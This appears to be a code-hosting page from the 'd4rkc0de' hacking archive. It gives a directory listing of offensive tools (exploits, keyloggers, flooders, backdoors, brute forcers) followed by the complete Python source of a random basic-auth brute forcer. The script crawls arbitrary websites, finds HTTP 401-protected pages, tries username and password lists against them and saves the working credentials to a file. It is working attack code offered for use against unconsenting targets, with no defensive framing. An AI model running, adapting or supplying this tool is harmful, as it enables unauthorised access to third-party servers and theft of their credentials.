python source code of webauthbrute

d4rkc0de-master
- exploits
  - 090404.py
  - 070320.py
  - 080404.py
  - 071127.py
  - 090113.py
  - 090506.py
  - 090519.py
  - 080712.py
  - 071125.py
  - 080402.py
  - 090618.py
  - 070314.py
  - 080316.py
  - 090622.py
  - 080323.py
  - 060721.py
  - 070322.py
  - 070316.py
  - 080226.py
  - 090204.py
  - 090302.py
  - 070415.py
  - 080327.py
  - 080405.py
  - 080315.py
  - 090428.py
  - 070412.py
  - 071218.py
  - 070720.py
  - 080303.py
  - 090803.py
  - 080115.py
  - 061128.py
  - 090205.py
  - 080328.py
  - 070603.py
  - 090210.py
  - 080314.py
  - 070310.py
  - 090406.py
  - 081015.py
  - 060813.py
  - 090425.py
  - 090724.py
  - 090203.py
  - 090401.py
  - 071107.py
  - 070201.py
  - 081014.py
  - 070515.py
  - 081222.py
  - 090620.py
  - 070103.py
  - 080124.py
  - 090211.py
  - 070326.py
  - 090722.py
  - 071014.py
  - 071024.py
  - 090505.py
  - 051219.py
  - 080318.py
  - 071212.py
  - 071028.py
  - 060908.py
  - 090723.py
  - 090110.py
  - 090426.py
  - 061225.py
  - 090120.py
  - 061028.py
  - 090421.py
  - 061209.py
  - 070807.py
  - 061107.py
  - 090310.py
  - 090312.py
  - 080228.py
  - 090701.py
  - 070518.py
  - 090206.py
  - 080411.py
  - 050501.py
  - 090518.py
  - 080104.py
  - 090801.py
  - 070301.py
  - 080630.py
  - 060515.py
  - 070516.py
  - 090116.py
  - 070607.py
  - 070330.py
  - 081214.py
  - 090419.py
  - 070321.py
  - 071126.py
  - 080403.py
  - 060715.py
  - 090117.py
  - 090107.py
  - 090422.py
  - 090623.py
  - 090405.py
  - 080617.py
  - 080416.py
  - 090321.py
  - 090311.py
  - 080421.py
  - 071016.py
  - 070105.py
  - 061127.py
  - 081216.py
  - 070925.py
  - 070323.py
  - 090114.py
  - 070520.py
  - 070924.py
  - 070430.py
  - 080310.py
  - index.html
  - 080724.py
  - 080709.py
  - 081203.py
  - 070610.py
  - 061118.py
  - 071029.py
  - 070814.py
  - 070918.py
  - 080107.py
  - 070517.py
  - 071807.py
  - 071103.py
  - 090313.py
  - 080428.py
  - 080109.py
  - 071128.py
  - 090115.py
  - 080415.py
  - 051220.py
  - 070107.py
  - 060826.py
  - 070825.py
  - 070329.py
  - 070716.py
- scanners
  - XSSscan_v1.2.py
  - win.py
  - webservscan.py
  - randwebservscan.py
  - XSSscan_v1.1.py
  - nukescan.py
  - cgiscan1.3.py
  - winrand.py
  - webmin_rand.py
  - bulletftp.py
  - webscan.py
  - lfiscan.py
  - ftprand.py
  - rfiscan.py
  - EFSscan.py
  - cgiscan1.2.py
  - bannerscan.py
  - cesarscan.py
  - cgiscan.py
  - ftpanon.py
  - hostlookup.py
  - index.html
  - cgiscan1.1.py
  - sqlscan.py
  - xoopscan.py
  - ipbanscan.py
  - mdaemonscan.py
  - surgescan.py
- LICENSE
- contact.php
- misc
  - findip.py
  - mysql16.py
  - rtgen.py
  - md5db.py
  - goog2text1.3.py
  - mail2text.py
  - searchdigits.py
  - PyLogcleaner.tar.gz
  - milarchive.py
  - emailcollect_v1.3.py
  - proxytest.py
  - milwebappext.py
  - phpbbmembers.py
  - alphadbgen.py
  - gaimextract.py
  - subcollect.py
  - dorkster.py
  - goog2text.py
  - wordextract.py
  - wordcreator.py
  - goog2text1.1.py
  - comparedb.py
  - suidchecker.py
  - scriptgrab.py
  - ipgen1.1.py
  - logcheck.py
  - iptext.py
  - passgen.py
  - goog_mail_mod.py
  - plaincrack.py
  - emailcollect_v1.2.py
  - md5dbcrack.py
  - checksummer.py
  - dataext.py
  - logfind.py
  - goog-subdomains.py
  - asm2shell.py
  - freesms.pyw
  - codefinder.py
  - dbgen.py
  - wordsplit.py
  - milupdate.py
  - honeypot.py
  - phpbbver.py
  - pywget_simp.py
  - modlast.py
  - emailcollect.py
  - logreader.py
  - sqlincra.py
  - strbreak.py
  - rfiex.py
  - passext.py
  - tabcolext.py
  - subcollect2.py
  - dumpemail.py
  - milsearch.py
  - index.html
  - d3sqlfuzz.py
  - logfind1.1.zip
  - pylogcleaner.py
  - iprange.py
  - randip.py
  - packext.py
  - pywget.py
  - goog2text1.2.py
  - iplocate.py
  - msn2text.py
  - googemail.py
  - ipgen.py
  - goog2text1.4.py
  - checkersum.py
  - orderby.py
- others
  - inside_pro_dl.py
  - ptf.py
  - hexdump.py
  - 1xfieldbrute.py
  - vnc.py
  - RevS.py
  - dpc-shodanscan.py
  - pide.py
  - darkMySQLi16.zip
  - darkTouch.py
  - daemon.py
  - mysql323crack.py
  - schemafuzz.py
  - encrak.py
  - psbot.py
  - sex.py
  - Springenwerk_XSS_Scanner_v0.4.5.zip
  - ChAP.py
  - sqlic.py
  - md5checksum.py
  - taof-0.1beta-src.tgz
  - zeppoo.tar.gz
  - malware_analyse.py
  - ora11gPWCrack.py
  - md5sum.py
  - shoutmix_tool.py
  - irc_brute.tar.gz
  - pykeylogger-0.9.1_src.zip
  - pkl.py
  - webanalyser.py
  - hi5.py
  - proxystrike-v1.0.tar.gz
  - links.py
  - pmabf.py
  - gSQLHarvest.py
  - sqlbrute.py
  - rCFuzz.py
  - pycrack.py
  - lfi-rfi.py
  - pysumpas-0.2.0.tar.gz
  - lx.zip
  - sqlfuzz.py
  - md5shabrute.py
  - fusil-0.9.tar.gz
  - evalencoder.py
  - wfuzz-1.4.tar.gz
  - portscan.py
  - httpcheck.py
  - proxyfuzz.py
  - fuskbucketenglish.py
  - oledbstract.py
  - vulndetect.py
  - rwhois.py
  - xxsdefense.py
  - darkPGSQLi.py
  - pastebin.py
  - darkSMTPv.py
  - cms.py
  - wpbrute.py
  - woof.py
  - dpc-hashcrack.py
  - devilzc0de.py
  - keylogger_src.zip
  - shellgen.py
  - scs.zip
  - netstat_tool.py
  - blowfish.py
  - pyscan.py
  - MySQL_double_SHA1_brute.py
  - gmail_check.py
  - batconv.py
  - blindfuzz.py
  - wininfo.py
  - phpass.py
  - scanlink.tar
  - aiocracker.py
  - ExploitMyUnion_linux.py
  - SMB_reroute.py
  - cgi-python.py
  - cisco_decrypt.py
  - dnsenum.py
  - creddump-0.1.tar.bz2
  - Webclicker.py
  - bing_sqli_scan.py
  - bb.tar.gz
  - sqlifinderb0t.py
  - sniff.py
  - doorknocker.py
  - GHY.py
  - ACOi.py
  - ftpbrute.py
  - exlex_win.py
  - password.pyw
  - yahoocheck.py
  - load_fuzz.py
  - mtsshbrute.py
  - untidy-beta2.tgz
  - maxfr.py
  - smtpd.py
  - dpc-FTPhunt.py
  - oraclefuz.py
  - darkKML.py
  - xtea.py
  - clfuzz.tar.gz
  - goog-mail.py
  - btk-0.4.4.tar.gz
  - BladeProxy.py
  - colfinder.py
  - delicious-captcha-cracker.py
  - simpleDorkGUi.py
  - star-1.0.tar.gz
  - pyproxycheck-V.0.1.tar.gz
  - aimcrack.py
  - ssh-sniffer.0.7.py
  - joomlabrute.py
  - fireinthehole.py
  - wwwsrvinfo.py
  - uniGen.py
  - index.html
  - darkSMTP.py
  - dorkScan.py
  - lastlog.py
  - fuzzer.tar.gz
  - Serverchk.py
  - portforward.py
  - py-libpcap.tar.gz
  - eventcalendar_scanner.py
  - ProxyHarvest.py
  - blindext.py
  - joomscan.py
  - darkMSSQL.py
  - integcheck.zip
  - iaxscan-0.02.tar.gz
  - libdisassemble.tar.gz
  - spomb.py
  - admin-scan.py
  - Webserverwatcher.py
  - ExploitMyUnion_windows.py
  - wMunch.py
  - bindshell.py
  - badabing.tar.gz
  - md5db11.py
  - openPorts.py
  - ngeotrace.py
  - dnsbee.py
- tutorials
  - index.html
- ircbots
  - crackbot1.2.py
  - dumpbot.py
  - nmapbot.py
  - ftpanonbot.py
  - crackbot.py
  - proxybot.py
  - banbot.py
  - spambot.py
  - b64encodebot.py
  - crackbot_mysql.py
  - scanbot.py
  - md5bot.py
  - b64decodebot.py
  - webbot.py
  - index.html
  - googleb0t.py
  - cmdsbot.py
  - hellobot.py
  - cgibot.py
- bruteforce
  - popbrute_random.py
  - mysqlbrute.py
  - telnetbrute_iprange.py
  - webauthbrute.py
  - popbrute.py
  - mysqlbrute_iprange.py
  - imapbrute_iprange.py
  - imapbrute_random.py
  - ftpbrute_random1.0.py
  - friendsterbf.py
  - phpBBbrute.py
  - sshbrute_fork.py
  - webauthbrute_random.py
  - smtpbrute_random.py
  - wordpressbf.py
  - gmailbrute.py
  - diggbf.py
  - locbrute.py
  - imapbrute.py
  - ftpbrute_iprange.py
  - smtpbrute.py
  - nntpbrute_random.py
  - nntpbrute.py
  - b2evobf.py
  - telnetbrute.py
  - snmp_brute.py
  - linksysbrute.py
  - webminbrute.py
  - ftpbrute.py
  - mysqlbrute_random.py
  - sshbrute_iprange.py
  - accbrute.py
  - cPanelbrute.py
  - ftpbrute_random.py
  - popbrute_iprange.py
  - index.html
  - webauthbrute_random_usersupport.py
  - sshbrute.py
  - dnsbrute.py
  - telnetbrute_random.py
  - serenbf.py
  - nntpbrute_iprange.py
  - rootbrute.py
  - smtpbrute_iprange.py
  - gmailpopbrute.py
  - sshbrute_random.py
- cheatsheets
  - oracle-cs.shtml
  - postgres-cs.shtml
  - mysql-cs.shtml
  - ingres-cs.shtml
  - msaccess-cs.shtml
  - index.html
  - toolbox.xhtml
  - mssql-cs.shtml
  - db2-cs.shtml
- README.md
- index.html
- c0de
  - perl
    - servscan.txt
    - beschreibung.txt
    - wyrm_v2.txt
    - Wlan-Deauther.txt
    - simplerat.txt
    - htaccess_Bruter.txt
    - FtpAnonScan_Gui_Edition.tar.gz
    - bindport.txt
    - blind_helper.txt
    - parandroid.txt
    - packcap.txt
    - cpanelbrute.txt
    - ff.txt
    - googsearch.txt
    - owlscan.txt
    - cpanelcheck.txt
    - blindfoxeng.txt
    - smbfetch.txt
    - pdf-fuzzer.txt
    - spider-4.0.tar.gz
    - spambot.txt
    - revip.txt
    - BrGmail.txt
    - sqlscan.txt
    - weberase.txt
    - ftpanonscan.txt
    - bhlsc_beta.txt
    - shellbot.txt
    - remoteircbot.txt
    - tarants.txt
    - dtdataext.txt
    - mtead.txt
    - emailextract.txt
    - shellfind.txt
    - cfpasswd.txt
    - injectscan.txt
    - rfiscan.txt
    - ebaylogin.txt
    - md5crack.txt
    - bunnybot.txt
    - ip2hex.txt
    - saimebot.txt
    - netbrute.txt
    - list_bing_results.txt
    - EgY_Multiple_Tool.txt
    - tkportscan.txt
    - silviasql.tar.gz
    - rfiscan2.txt
    - skype.txt
    - bfora.txt
    - sitelist.txt
    - iisscan.txt
    - phpscan.txt
    - logips.txt
    - md5crack1.txt
    - v6ircscan.txt
    - st4lk3r.tar.gz
    - dorker.txt
    - tcpudpflood.txt
    - webclick.txt
    - nmapscan.txt
    - dbextract.txt
    - mydump1.txt
    - Viper_Auto_Rooting.txt
    - ddos.txt
    - asw-v.1.0.txt
    - sweeper.txt
    - lfi-checker.txt
    - FtpAnonScanV2.0.zip
    - irc_bot_v0.1.txt
    - portcheck.txt
    - cts.txt
    - cgiscan.txt
    - admin_search.txt
    - bot.txt
    - excheck.txt
    - sql-ole.txt
    - conback.txt
    - yoni_project.rar
    - connectback.txt
    - vncscan1215.txt
    - Googler_v1.69.rar
    - WepSploit.txt
    - skype2.txt
    - syslog-fuzzer.txt
    - getreq.txt
    - whoweb.txt
    - proxyscan.txt
    - shellgen1.txt
    - fierce.txt
    - spy.txt
    - GB_Pwner.txt
    - botsniff.txt
    - emailgrab1.txt
    - SQL-0xh0.txt
    - ftpscan.txt
    - brftp.txt
    - logeraser.txt
    - ByPass-ASP.rar
    - error_code_shema_extract.txt
    - Multiple_Scan.txt
    - LFI_Scanner_Full_&_Priv8.txt
    - listcheck.txt
    - udpflood.txt
    - smtpcheck.txt
    - rand1.txt
    - autoclick.txt
    - defacer.txt
    - leech.txt
    - md5brute.txt
    - proxycheck.txt
    - webserv.txt
    - conbacks.txt
    - sql_injector_v2.txt
    - drdos.txt
    - md5multi.txt
    - desplay.txt
    - phpMyAdminChecker.txt
    - md5search.txt
    - ipbflooder.txt
    - header_poisoning.txt
    - smallportscan.txt
    - dirspider.txt
    - revealer.txt
    - mcm.txt
    - dr4k3_lfiscan.txt
    - phpbbver.txt
    - vanitykey.txt
    - endscan.txt
    - perlbot.txt
    - dmzscan-0.2.txt
    - vulnscan.txt
    - cmdgoog.txt
    - inj.zip
    - nepgui.txt
    - b0fuzzer.txt
    - md5kit.txt
    - rand.txt
    - shellgen2.txt
    - L0g_b0t.txt
    - md5crack2.txt
    - emailgrab.txt
    - sqlinsert.txt
    - mydump.txt
    - WepSploit_2.0.txt
    - varcon-4.1.tar.gz
    - dump_pirq.txt
    - sqlpwnzeng.txt
    - aimcheck.txt
    - massdeface.txt
    - tables_php_asp.rar
    - brutemsn.txt
    - md5_dz.txt
    - satanbot.txt
    - simpleproxycheck.txt
    - pop3crack.txt
    - bruteall.txt
    - md5cracker-bot.txt
    - index.html
    - acbackdoor.txt
    - lfi-logs.txt
    - admin_1.2_.txt
    - md5lookup.txt
    - wordlisttool.txt
    - ircbot.txt
    - dicmake.txt
    - BruteSSH.txt
    - newsupervuln.txt
    - bluetest.txt
    - ginjector.txt
    - bttel.txt
    - fastemail.txt
    - LFI_scanner.txt
    - bangrab.txt
    - telnet.txt
    - logclean.txt
    - arpdos.txt
    - hexSQLi.txt
    - milrss.txt
    - getenv.txt
    - rfi-checker.txt
    - rtscan.txt
    - words.txt
    - site_crawler.txt
    - zonehposter.txt
    - md5reverse.txt
    - shoutbox.txt
    - becks.txt
    - torconnect.txt
    - bhlsc1.0.txt
    - vulnzscan.txt
    - hashmatch.txt
  - php
    - rproxy.txt
    - dosbot.txt
    - codeanalyzer.txt
    - clientinfo.txt
    - snmpscan.txt
    - sqlbrute.txt
    - evilrfiscan.txt
    - govmilhits_php.txt
    - sp3.rar
    - mysqlextract.txt
    - wscan.tar.gz
    - emailextract.txt
    - phpfuzzer.zip
    - md5crack.txt
    - vulnscanner.txt
    - Dichotomy.txt
    - DarkWVS.txt
    - hcr-mysql-ocbf.txt
    - roots.txt
    - DarkLFI.txt
    - massmailer.txt
    - lsq.txt
    - md5-decrypter.zip
    - cgiscan.txt
    - pscan.txt
    - nntime.txt
    - phuzzer.txt
    - exploit_grab.txt
    - sleazBOT.tar.gz
    - sql_inyexion_scan.rar
    - face_book_brute_forcer.txt
    - PHPreter.txt
    - full_php_worm.tar.gz
    - xmlparse.txt
    - phpfuzzer1.zip
    - cod3rzshell.zip
    - s.txt
    - Cookiestealer_by_Neo2k8.rar
    - FIS-v0.2.tar.gz
    - wmd5.txt
    - writedir.txt
    - index.html
    - IPB_Message_bommber.txt
    - proxy-extract.txt
    - adminfind.txt
    - Sql_injection_scanner.txt
    - milrss.txt
    - neutsqldumper.txt
    - bfgmail.txt
    - phpscanner.txt
    - rapidinfo.zip
    - steg.txt
    - spike_phpSecAudit_0.27.zip
    - curlbrute.txt
    - portscan.txt
  - ruby
    - sshbrute.txt
    - sqid-0.3.tar.gz
    - msnsniff.txt
    - domainchecker.rb
    - pwnpress.zip
    - nnbot.txt
    - scan.txt
    - index.html
    - elfparse.txt
    - BH-FE_0.5.txt
    - portscan.txt
    - keylog.txt
  - c
    - md2.txt
    - dllinject.txt
    - mysql_hash_cracker.txt
    - msnfuzzer.txt
    - process.txt
    - crip.txt
    - decoy.txt
    - mysqlbrute.txt
    - msncapture.txt
    - passgen.txt
    - cdtray.txt
    - sniff.txt
    - ircvhost.txt
    - sshbrute.txt
    - ss.txt
    - cloner.txt
    - jackal.txt
    - vnccrack.txt
    - type.txt
    - pop3dbrute.txt
    - mlys.txt
    - freedos.txt
    - gh0st.txt
    - wpepro.txt
    - dnsrpcscan.txt
    - linsniff.txt
    - sqlping.txt
    - qssscan.txt
    - rc4.txt
    - a2h.txt
    - keyfind.txt
    - msnlive.txt
    - shutdown.txt
    - sniffit.txt
    - coldscan.txt
    - startup.txt
    - vncscan.txt
    - phelon.txt
    - dewin95.txt
    - spoofer.txt
    - handle.txt
    - utrojan.txt
    - rot13.txt
    - probetcp.txt
    - mutilate.txt
    - bruteforce.txt
    - msnfreeze.txt
    - napscan.txt
    - HideProcess.zip
    - quescan.txt
    - ftpbrute2.txt
    - arat.txt
    - cgiscan.txt
    - icqdecrypt.txt
    - ethscan.txt
    - udpscan.txt
    - log_clean.txt
    - aimdump.txt
    - xtea.txt
    - k1us_wordlist_generator.cpp.txt
    - conback.txt
    - synscan.txt
    - getrequest.txt
    - imbomb.txt
    - get_banner.txt
    - cdump.txt
    - halfscan.txt
    - pingreply.txt
    - procmask.txt
    - idletime.txt
    - nfss.txt
    - proxyscan.txt
    - cgiscan1.txt
    - domainscan.txt
    - mybind.txt
    - flooder.txt
    - ftpscan.txt
    - msndecrypt.txt
    - holyshit.txt
    - kernelback.txt
    - botkilla.txt
    - shadowpw.txt
    - locatemouse.txt
    - cookbrute.txt
    - steamlog.txt
    - amdscan.txt
    - b4b0.txt
    - FindJMP.txt
    - monoff.txt
    - clicktime.txt
    - rev.txt
    - sql_dump_by_reiluke.rar
    - ftpbrute.txt
    - portscan2.txt
    - dumpram.txt
    - keylogsimp.txt
    - 1025attack.txt
    - sifter.txt
    - finddomains.txt
    - whitecat.txt
    - elfchange.txt
    - startit.txt
    - ciscocrack.txt
    - sshban.txt
    - cstealer.txt
    - httpscan.txt
    - dirscan.txt
    - remotes.txt
    - sshscan.txt
    - sol.txt
    - fakepro.txt
    - xhide.txt
    - messscan.txt
    - md5func.txt
    - esniff.txt
    - suicide.txt
    - lscan.txt
    - index.html
    - udpscan1.txt
    - synner.txt
    - mysqlpassword.txt
    - spypipe.txt
    - bluedos.txt
    - crunch.txt
    - sqlcrawl.txt
    - websniff.txt
    - pgmfuzz.txt
    - Password_Generator.rar
    - iscan.txt
    - mouseprank.cpp.txt
    - sqlexec.txt
    - httpver.txt
    - 64coder.txt
    - mysqlbrute1.txt
    - memdump.txt
    - portscan.txt
    - irclisten.txt
  - others
    - melissa.txt
    - aspbackdoor.txt
    - h4ck3r-encoder.rar
    - hacker_webkit02.tar.gz
    - wordpressbf.txt
    - rpcck.txt
    - jsps.txt
    - nod32.txt
    - MySpacer.zip
    - ipb_cracker.txt
    - wordpress_brute.txt
    - firewall.txt
    - rarcrack.txt
    - dicgen.txt
    - wbc-v1b.tar.gz
    - desencrypt.txt
    - javasha1.txt
    - javabot.txt
    - nmbscan-1.2.5.tar.gz
    - index.html
    - checkstack.txt
    - tinys.txt
    - nmap-random.txt
    - tablehook.txt
    - dnsscan.txt
    - cdkey.txt
  - index.html
- encryption
  - wepgen.py
  - htgen.html
  - base64tohex.py
  - decoder.py
  - alphalowcrack.py
  - sha1gen.py
  - md5check.py
  - rot13.py
  - dumpcrack.py
  - encoder.py
  - pincrack.py
  - rot13gen.html
  - sha1crack.py
  - htcrack.py
  - wepdecode.py
  - md5gen.py
  - dumpcrack1.1.py
  - wepcrack.py
  - md5crack.py
  - wpacrack.py
  - md5word.py
  - index.html
  - mysql5crack.py
  - md5crack_gui.pyw
  - md5randcrack.py
  - hashgen.py
  - passgen.html

#!usr/bin/python
#Pop-up Basic Authentication Random Brute Forcer
#It will scan for 401 authentication, brute force and save 
#successfull logins to a file.
#Not fully tested, encourage feedback.
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com

import threading, time, random, sys, urllib2, httplib, re, socket
from copy import copy

if len(sys.argv) !=6:
	print "\nUsage: ./webauthbrute_random.py <start website> <userlist> <wordlist> <how many> <file to save logins>\n"
	print "Ex: ./webauthbrute_random.py www.busywebsite.com users.txt words.txt 100 logins.txt\n"
	sys.exit(1)

try:
  	users = open(sys.argv[2], "r").readlines()
except(IOError): 
  	print "Error: Check your userlist path\n"
  	sys.exit(1)
  
try:
  	words = open(sys.argv[3], "r").readlines()
except(IOError): 
  	print "Error: Check your wordlist path\n"
  	sys.exit(1)

wordlist = copy(words)
hits = 0
logins = 0

def geturls(url):
	
	try:
		print "[+] Collecting:",url
		page = urllib2.urlopen(url).read()
		links = re.findall(('http://\w+.\w+\.\w+[/\w+.]*[/.]\w+'), page)
		for link in links:
			if link not in urls and link[-3:].lower() not in ("gif","jpg","png","ico"):
				urls.append(link)
	except(IOError,TypeError,AttributeError,httplib.BadStatusLine,socket.error): pass
	return urls

def reloader():
	for word in wordlist:
		words.append(word)

def getword():
	lock = threading.Lock()
	lock.acquire()
	if len(words) != 0:
		value = random.sample(words,  1)
		words.remove(value[0])		
	else:
		print "\nReloading Wordlist - Changing User\n"
		reloader()
		value = random.sample(words,  1)
		users.remove(users[0])
		
	lock.release()
	if len(users) ==1:
		return users[0], value[0][:-1]
	else:
		return users[0][:-1], value[0][:-1] 

def getauth(site):
	
	print "[-] Checking Authentication:",site
	global hits
	try:
		req = urllib2.Request(site)
		handle = urllib2.urlopen(req)
		if site in urls:
			print "Removing:",site
			urls.remove(site)
	except(IOError,urllib2.URLError,urllib2.HTTPError,httplib.BadStatusLine,socket.error), msg:
			print "\t- Got:",msg,"\n"
			try:
				if hasattr(msg, 'code') or msg.code == 401:
					authline = msg.headers.get('www-authenticate', '')
					if authline:
						print "[+]",authline
						print "[+] Found site using basic authentication"
						print "[+] Attempting Brute Force on",site,"\n"
						hits +=1
						for i in range(len(words)*len(users)):
							work = threading.Thread()
							work.setDaemon(1)
							work.start()
							threader(site)
							time.sleep(1)
			except(AttributeError):
				pass
	else: 
		print "\t- Got: 200\n"
				
def threader(site):
	username, password = getword()
	global logins
	try:
		print "-"*12
		print "User:",username,"Password:",password
		req = urllib2.Request(site)
		passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
		passman.add_password(None, site, username, password)
		authhandler = urllib2.HTTPBasicAuthHandler(passman)
		opener = urllib2.build_opener(authhandler)
		fd = opener.open(req)
		site = urllib2.urlopen(fd.geturl()).read()
		print "\n[+] Checking the authenticity of the login...\n"
		if not re.search(('denied'), site.lower()):
			print "\t\n\n[+] Username:",username,"Password:",password,"----- Login successful!!!\n\n"
			print "[+] Writing Successful Login:",sys.argv[5],"\n"
			logins +=1
			file = open(sys.argv[5], "a")
			file.writelines("Site: "+site+" Username: "+username+ " Password: "+password+"\n")
			file.close()			
			print "Retrieved", fd.geturl()
			info = fd.info()
			for key, value in info.items():
    				print "%s = %s" % (key, value)
		else: 
			print "- Redirection"
	except (urllib2.HTTPError, httplib.BadStatusLine,socket.error), msg: 
		print "An error occurred:", msg
		pass

def giddyup(start):
	if start[:7] != "http://":
		start = "http://"+start	
	urls = geturls(start)
	for x in range(1,int(sys.argv[4])):
		print "- Destination:",x,"of",int(sys.argv[4])
		if len(urls) < 5000:
			urls = geturls(random.choice(urls))
			print "- Collected:",len(urls)
			site = random.choice(urls)
			getauth(site)
			for i in range(2,site.count('/')):
				site = site.rpartition('/')[0]
				getauth(site)
		else:
			for url in urls[1:2500]:
				urls.remove(url)
			
urls = []
start = sys.argv[1]

print "\n\t d3hydr8[at]gmail[dot]com WebauthBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Starter:",start
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
print "[+] Scanning:",sys.argv[4]
print "[+] Logins File:",sys.argv[5],"\n"

time.sleep(5)
giddyup(start)

while start:
	print "\n\nFound",hits,"sites using basic authentication."
	print "Logins Reported:",logins
	start = raw_input("Enter new starting site or Press enter to exit: ")
	if start: 
		giddyup(start)	
if hits >= 1:
	print "\n\nFound:",hits,"brute forced\n"
if logins >= 1:
	print "Check:",sys.argv[5]	
print "\n[+] Done\n"